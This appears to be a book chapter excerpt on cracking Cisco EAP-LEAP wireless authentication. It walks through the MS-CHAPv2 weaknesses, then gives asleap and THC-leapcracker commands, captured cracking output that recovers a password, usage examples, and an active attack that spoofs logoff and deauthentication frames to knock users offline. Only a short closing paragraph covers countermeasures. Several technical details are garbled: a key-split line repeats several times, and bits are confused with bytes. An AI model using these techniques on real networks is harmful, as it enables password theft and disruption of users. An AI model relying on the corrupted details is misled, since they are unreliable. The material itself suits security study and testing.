CISCO EAP-LEAP CRACKING

EAP-LEAP Cracking

The root of the problem is EAP-LEAP using Microsoft Challenge Handshake Authentication Protocol v2 (MS-CHAPv2) in the clear to authenticate users. Thus, several known MS-CHAPv2 flaws are inherited, including sending plaintext usernames (half of the guesswork gone), weak challenge/response Data Encryption Standard (DES) key selection, and an absence of salt in the stored NT hashes. All these flaws can be exploited to make cracking EAP-LEAP shared keys a much easier task. Let's have a look at challenge/response process first.

In the beginning, the authenticator issues a random 8-bit nonce to the supplicant. Then the supplicant uses a 16-byte MD4 hash of a shared secret to generate three DES keys:

 1. NT1 - NT7     2. NT8 - NT14     3. NT15 - NT16 + 
 1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \0 
 
 1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \0 
 
 1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \0 
 
 1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \0 
 
 1. NT1 - NT7 2. NT8 - NT14 3. NT15 - NT16 + \0 \0 \0 \0 \0 
 

After that, each produced DES key is employed to encrypt the challenge nonce, generating 8 bytes of output per key; then a 24-byte response is sent back to the authenticator, which then issues a success or failure frame to the supplicant after consulting the RADIUS server.

The first problem here is that the third DES key is weak. The five nulls mentioned are present in every challenge/response. This leaves us a DES key size of 16 bits only. Cracking a 16-bit DES knowing the plaintext challenge is easyin fact, it can be done within a second. This helps to calculate two out of eight MD4 hash bytes; as a result, only six are left. They can be cracked using a dictionary attack against a large prebuilt MD4 hash table. Considering the speed of the MD4 cipher, such a table would not take a lot of time to generate.

To summarize, here is an actual attack:

1. Build a large list of MD4- hashed passwords.

2. Sniff out EAP-LEAP challenge/response frames .

3. Obtain challenge, response, and username from the frames.

4. Use the response to calculate the last two bits of the MD hash.

5. Launch the dictionary attack against the remaining six bits of the hash, using the list from Step 1.

A few tools can be used to implement this attacknamely Joshua Wright's asleap-imp , THC-leapcrack , and leap by DaBubble, Bishop, and Evol. Asleap-imp was the first tool to be described to the general public (at DEFCON 11) and is very mature. Thus, we will center on this particular piece of software here. Asleap-imp consists of two utilities: Genkeys generates a list of MD4 hashes from a supplied password list. This list is created as a " password ˆ˜Tabˆ˜ hash " table and is useful for dictionary-type attacks against any MD4 password file. The second utility, asleap , implements the practical attack itself in the following way:

1. The data is taken from a wireless interface in the RFMON (radio frequency monitoring) mode or a pcap format dump file, such as Kismet or Ettercap dump:

    arhontus / # ./asleap -D arhontus / # ./asleap -i <interface name> -o -t 10 -v 

   or

    arhontus# ./asleap -r <pcap dumpfile> -v 

2. EAP-LEAP challenge/response frames are flagged out.

3. The last two bits of the MD4 hash are calculated using the third weak DES key.

4. Cracked and remaining bits are compared against the password:hash table generated by genkeys . Found passwords are reported .

Since waiting for legitimate EAP-LEAP logins can take plenty of time, asleap-imp can knock the authenticated wireless users offline by scanning through all 802.11 channels, identifying connected clients , and sending spoofed EAP-LEAP logoff frames to them. This is followed by spoofed deauthentication frames to drop clients from wireless LANs (WLAN) and triggering a new challenge/response exchange. The exchange is dumped as a pcap format file to allow further password cracking on a more powerful machine. An option to specify this "active attack" is -a ; AirJack drivers are required for spoofed EAP-LEAP and deauthentication frames injection. A live example of attack using asleap-imp against a Kismet dump file is as follows :

 arhontus / # ./genkeys -r worldlist-all -f hashtable -n index.idxgenkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com> Generating hashes for passwords (this may take some time) ...Done. 1614816 hashes written in 3.76 seconds: 429699.99 hashes/second Starting sort (be patient) ...Done. Completed sort in 18363792 compares. Creating index file (almost finished) ...Done. arhontus / #./asleap -r eap-leap-containing-dump -v -f hashtable -n index.idxarhontus / # ./asleap -r /eap-dumps -v -f hashtable -n index.idx asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> Using the passive attack method. Captured LEAP challenge:          0802 7500 0040 9641 b67f 0040 9645 a06c ..u..@.A...@.E.l          0040 9645 a06c a0c5 aaaa 0300 0000 888e .@.E.l..........          0100 001f 0100 001f 1101 0008 223c 6e74 ............"<nt          1050 1e46 4543 454d 415c 625f 636c 6179 .P.FCEM_user          746f                                    to 6e                n Captured LEAP response:          0801 a200 0040 9645 a06c 0040 9640 d983 .....@.E.l.@.@..          0040 9645 a06c 309b aaaa 0300 00f8 888e .@.E.l0.........          0100 002f 0200 002f 1101 0018 4929 d530 .../.../....I).0          41d2 fecc 0de4 968a 9283 92c9 0a99 dcd0 A...............          38e6 1e67 494d 4543 454d 415c 685f 7465 8..gIMCEM_us          7261                                    ra 6e                n Captured LEAP auth success:          0802 7500 0040 9640 d983 0040 9645 a06c ..u..@.@...@.E.l          0040 9645 a06c 6007 aaaa 0300 0000 888e .@.E.l'.........          0100 0004 0300 0004                     ........ Captured LEAP exchange information:           username:         ECEMA_user1         challenge:        223c6e7410501e46         response:         4929d53041d2fecc0de4968a928392c90a99dcd038e61e67         Attempting to recover last 2 of hash.         Could not recover last 2 bytes of hash from the         challenge/response. Sorry it didn't work out. Captured LEAP challenge:          0802 7500 0040 9641 9bce 0040 9647 b8bf ..u..@.A...@.G..          0040 9647 b8bf 90ca aaaa 0300 0000 888e .@.G............          0100 001f 0100 001f 1101 0008 7971 0775 ............yq.u          f011 de15 4543 454d 415c 765f 6d63 656e ....ECM_user          7465                                    te 65                 e Captured LEAP response:          0801 a200 0040 9647 b8bf 0040 9641 9bce .....@.G...@.A..          0040 9647 b8bf 00b7 aaaa 0300 00f8 888e .@.G............          0100 0031 0200 0031 1101 0018 4f4c eef0 ...1...1....OL..          23a6 ac29 d964 fe95 0014 2d99 74b4 9277 #..).d....-.t..w          c0ae 07d3 494d 4543 454d 415c 765f 6d63 ....IMCEM_us          656e 7465 65                            entee Captured LEAP auth success:          0802 7500 0040 9641 9bce 0040 9647 b8bf ..u..@.A...@.G..          0040 9647 b8bf d0ca aaaa 0300 0000 888e .@.G............          0100 0004 0300 0004 ........ Captured LEAP exchange information:         username:          ECM_user         challenge:         79710775f011de15         response:          4f4ceef023a6ac29d964fe9500142d9974b49277c0ae07d3         Attempting to recover last 2 of hash.         hash bytes:        7a6b         Starting dictionary lookups.         Found a matching password! w00t!         <password has been skipped> Reached EOF on pcapfile. 

Note that asleap-imp can be installed and utilized on both Linux and Windows . Both genkeys and asleap can be compiled on Windows platforms using the WinPcap developer's pack that can be downloaded from http://www.winpcap.org/. To scan for vulnerable WLANs with asleap on Windows, you will need AiroPeek NX drivers (try out the demo version of AiroPeek NX from http://www.wildpackets.com/products/demos/apwnx ). You can also parse AiroPeek.apc dumps with asleap using the -r flag.

To compile asleap-imp on Windows, do the following:

1. Get and set up WinPcap.

2. Obtain and install cygwin with the win32api package and development tools.

3. Get and unzip the WinPcap developer's pack.

4. Edit the makefile.cygwin file, changing the WPDPACK line to correspond to the path where you extracted the WinPcap developer's pack.

5. Execute make -f makefile.cygwin to build the tools. If you want to copy the asleap.exe and genkeys.exe files to another Windows box that doesn't have cygwin installed, you'll also need to copy the cygwin1.dll and cygcrypt-0.dll files with them.

Keep in mind that it won't be possible to execute an active attack against EAP-LEAP-supporting WLANs from Windows, since AirJack drivers are required. Unfortunately, AirJack is no longer maintained by Abaddon. Fortunately, we picked up the active maintenance and released a version of AirJack for 2.6.x Linux kernels that you can download at http://www.wi-foo.com/soft/attack/airjack26-0.1a.tar.bz2.

THC-leapcracker is similar in functionality to asleap-imp , but with a few twists . For example, its getleap utility can spoof the access point LEAP response, so the targets are fed the attacker-defined nonce to calculate the challenge response. A possible advantage of this functionality is that the nonce is identical for all wireless users, which means the attacker can use a single precompiled password/hash table for all targets. THC-leapcracker also has its own wordlist generator ( wordgen ) and a utility to do mass user deauthentication. The use of its main utility, leap-cracker , is self-explanatory:

 arhontus / # ./leap-cracker NTChallengeResponse Attack Tool written by DeX7er '03 (dexter@thc.org) Ver.0.1 

You can use THC-leapcracker to reverse NtChallengeResponse hashes to cleartext passwordsfor example, sniffed Cisco LEAP Passwords. Run the tool with the -h flag for usage options:

 This code is Proof of Concept (POC) and comes without any warranty, so use it on your own risk. It is free software; you can redistribute it and/or modify it un- der the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the license, or (at your option) any later version. Usage: ./leap-cracker [-l <Password length>] [-a <Alphabet string>] [-w <Alphabet string>] [-b <filename>] [-f <filename>] [-u <filename>] [-t <NtChallengeResponse>][-c <challenge>] [-p refix][-v] [-o]         -l password length (max. 15)         -a alphabet (the characters that should be used to build the password)         -w alphabet input with wildcars: a-z; A-Z; 0-9         -f use a wordlist file for password cracking instead of the alphabet            generator(Pwd length max. 15 characters).          (without -l, -a or -f the default filename 'wordlist.txt' is used)         -b bruteforce attack against pre-compiled binary password file           (generated with passwords_convert2bin)         -u userlist (ASCII Format: USERNAME CHALLENGE NTCHALLENGERESPONSE)         -t sniffed NT Challenge Response Hash (24 hexdigits) following formats            are supported:            "FFFF...",</quote>FF FF</quote>...,"FF-FF...","ffff...","ff ff"...,            "ff-ff...","ff:ff..."            (e.g. cut'n paste from ethereal (all blanks, '-' and ':' are            ignored)         -c challenge. The 8 byte random value that is used to calculate the NT            Challenge Response. Input format is the same like for the -t            option. Default value, if not set, is 'deaddeaddeaddead'.         -p prefix for password generation (password = [prefix]+[generated            combinations]         -v check number of combinations, ask before starting brute force            attack and verbose output         -o output to stdout (show all generated pwd combinations (only for            debugging)) max. number of combinations = 18446744073709551615 Hint: The way in which order the passwords are generated, depends on the order of your input. The algorithm is a number system algorithm, so your alphabet characters are the number system members. E.g.: -a 01  -l 3  means the passwords are generated like this: 000,001,010,011,100,... -a abc -l 3 means the passwords are generated like this: aaa,aab,aac,aba,abb,... -a cba -l 3 means the passwords are generated like this: ccc,ccb,cca,cbc,cbb,... Example for Password = 'awctlr' with alphabet generator: ./leap-cracker -l 6 -a abcdefghijklmnopqrstuvwxyz -t 34f208583cda2e6674749fa08fff18663fb75c01c6537082 -c 102db5df085d3041 -v Example for Password = 'cisco123' with a ASCII wordlist file 'wordlist.txt': ./leap-cracker -f wordlist.txt -t \ 1ef803cbfb06a09867f5ebf56b04f7a036954f13b81896cc -c 102db5df085d3041 Example for an ASCII wordlist file 'wordlist.txt' and userlist file 'userlist.txt': ./leap-cracker -f wordlist.txt -u userlist.txt Example for a pre-compiled passwordlist file 'wordlist.bin' and a userlist file 'userlist.txt', using the default challenge ./leap-cracker -b wordlist.bin -u userlist.txt Example for a userlist compared with generated passwords starting with cisco+[nnn] where nnn are numbers from 0-9 ./leap-cracker -u userlist.txt -p cisco -l 3 -w 0-9 

THC-leapcracker requires AirJack drivers to run active attacks, and without AirJack being installed, both get-leap and all-deauth tools will not compile.

Both asleap-imp and THC-leapcracker can be used to attack wired switched networks just as well. Obviously, you won't be able to deauthenticate Ethernet users, but sending EAP-LEAP logoff frames is still a valid option, as well as a variety of efficient DoS attacks on LANs, such as ARP-based ones.

Countermeasures Against EAP-LEAP Cracking

EAP-FAST provides a seamless migration from EAP-LEAP, does not require digital certificates and Public Key Infrastructure (PKI) support on end-user hosts , and is easily integrated with both Microsoft Active Directory and Lightweight Directory Access Protocol (LDAP). One-time passwords can also be used. Visit http://www.cisco.com/warp/public/cc/pd/witc/ao1200ap/prodlit/eapfs_qa.htm to find more about this security protocol.